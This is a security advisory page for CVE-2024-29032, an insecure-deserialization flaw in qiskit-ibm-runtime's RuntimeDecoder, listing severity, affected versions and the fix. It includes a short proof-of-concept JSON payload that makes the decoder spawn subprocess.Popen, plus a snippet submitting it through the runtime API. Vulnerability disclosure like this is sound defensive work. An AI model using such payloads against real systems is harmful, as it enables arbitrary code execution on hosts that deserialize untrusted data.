GHSA-x4x5-jv3x-9c7m

Source

https://github.com/advisories/GHSA-x4x5-jv3x-9c7m

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-x4x5-jv3x-9c7m/GHSA-x4x5-jv3x-9c7m.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-x4x5-jv3x-9c7m

Aliases

CVE-2024-29032

Published

2024-03-20T15:44:22Z

Modified

2024-03-20T21:46:53.419489Z

Severity

5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L CVSS Calculator

Summary

`qiskit_ibm_runtime.RuntimeDecoder` can execute arbitrary code

Details

Summary

deserializing json data using qiskit_ibm_runtime.RuntimeDecoder can be made to execute arbitrary code given a correctly formatted input string

Details

RuntimeDecoder is supposed to be able to deserialize JSON strings containing various special types encoded via RuntimeEncoder. However, one can structure a malicious payload to cause the decoder to spawn a subprocess and execute arbitrary code, exploiting this block of code: https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskitibmruntime/utils/json.py#L156-L159

PoC

malicious_data = {
    "__type__": "settings",
    "__module__": "subprocess",
    "__class__": "Popen",
    "__value__": {
        "args": ["echo", "hi"]
    },
}
json_str = json.dumps(malicious_data)

_ = json.loads(json_str, cls=qiskit_ibm_runtime.RuntimeDecoder)  # prints "hi" to the terminal

(where obviously "echo hi" can be replaced with something much more malicious)

notably the following also makes it through the runtime API, with malicious_data serialized client-side via RuntimeEncoder (and therefore presumably deserialized server-side via RuntimeDecoder?)

service = qiskit_ibm_runtime(<ibm_cloud_credentials>)
job = service.run("qasm3-runner", malicious_data)
print(job.status())  # prints "JobStatus.QUEUED"

Impact

i don't know if qiskit_ibm_runtime.RuntimeDecoder is used server-side so this may or may not be a serious vulnerability on your end (however it's definitely a security hole for anyone using the library to deserialize third-party data)

Database specific

{
    "nvd_published_at": "2024-03-20T21:15:31Z",
    "cwe_ids": [
        "CWE-502"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-20T15:44:22Z"
}

References

Affected packages

PyPI / qiskit-ibm-runtime

Package

Name: qiskit-ibm-runtime; View open source insights on deps.dev
Purl: pkg:pypi/qiskit-ibm-runtime

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0.1.0

Fixed

0.21.2

Affected versions

0.*

0.1.0

0.1.1

0.2.0

0.3.0

0.4.0

0.5.0

0.6.0

0.6.1

0.6.2

0.7.0rc1

0.7.0rc2

0.7.0

0.8.0

0.9.0

0.9.1

0.9.2

0.9.3

0.9.4

0.10.0

0.11.0

0.11.1

0.11.2

0.11.3

0.12.0

0.12.1

0.12.2

0.13.0

0.14.0

0.15.0

0.15.1

0.16.0

0.16.1

0.17.0

0.18.0

0.19.0

0.19.1

0.20.0

0.21.0

0.21.1

Ecosystem specific

{
    "affected_functions": [
        "qiskit_ibm_runtime.RuntimeDecoder"
    ]
}